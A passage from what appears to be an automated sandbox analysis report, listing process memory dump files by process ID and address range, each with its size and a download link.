                                                                                                                                                                                              • memory/13336-23178-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                56KB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/13336-23179-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                56KB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/15328-23169-0x000002629AF70000-0x000002629AFAC000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                240KB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/15328-23168-0x0000026282720000-0x0000026282732000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                72KB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/15328-23167-0x00000262826B0000-0x00000262826CE000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                120KB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/15928-23154-0x0000000006B00000-0x0000000006B1E000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                120KB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/15928-23163-0x0000000006C90000-0x0000000006D9A000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                1.0MB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/15928-23128-0x0000000000400000-0x0000000000452000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                328KB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/15928-23132-0x0000000005740000-0x00000000057D2000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                584KB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/15928-23130-0x0000000005C50000-0x00000000061F4000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                5.6MB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/15928-23134-0x0000000005730000-0x000000000573A000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                40KB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/15928-23151-0x0000000006380000-0x00000000063F6000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                472KB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/15928-23164-0x0000000006BD0000-0x0000000006BE2000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                72KB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/15928-23166-0x0000000006DA0000-0x0000000006DEC000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                304KB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/15928-23165-0x0000000006C30000-0x0000000006C6C000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                240KB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/15928-23162-0x0000000007140000-0x0000000007758000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                6.1MB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/19532-23052-0x000001DF1E2C0000-0x000001DF1E5A4000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                2.9MB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/19728-23198-0x0000000000260000-0x00000000008EE000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                6.6MB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/19728-23047-0x0000000000260000-0x00000000008EE000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                6.6MB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/20124-23061-0x0000000000AA0000-0x000000000112E000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                6.6MB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/20124-23022-0x0000000000AA0000-0x000000000112E000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                6.6MB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/21060-23127-0x0000000000750000-0x0000000000C0A000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4.7MB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/21060-22976-0x0000000000750000-0x0000000000C0A000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4.7MB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/21060-23113-0x0000000000750000-0x0000000000C0A000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4.7MB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/21604-22955-0x0000000000540000-0x00000000009FA000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4.7MB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/21604-22973-0x0000000000540000-0x00000000009FA000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4.7MB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/23264-22914-0x0000000000560000-0x00000000005B4000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                336KB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/23640-22916-0x0000000140000000-0x00000001419FB000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                26.0MB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/23640-22915-0x00007FFA199F0000-0x00007FFA199F2000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                8KB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/26108-22784-0x0000000000E20000-0x0000000000EA4000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                528KB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/38128-23600-0x0000000000400000-0x0000000000440000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                256KB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/38128-23625-0x00000000068C0000-0x0000000006910000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                320KB

                                                                                                                                                                                                Download

                                                                                                                                                                                              • memory/38448-16860-0x00000000008E0000-0x0000000000952000-memory.dmp

                                                                                                                                                                                                Filesize

                                                                                                                                                                                                456KB

                                                                                                                                                                                                Download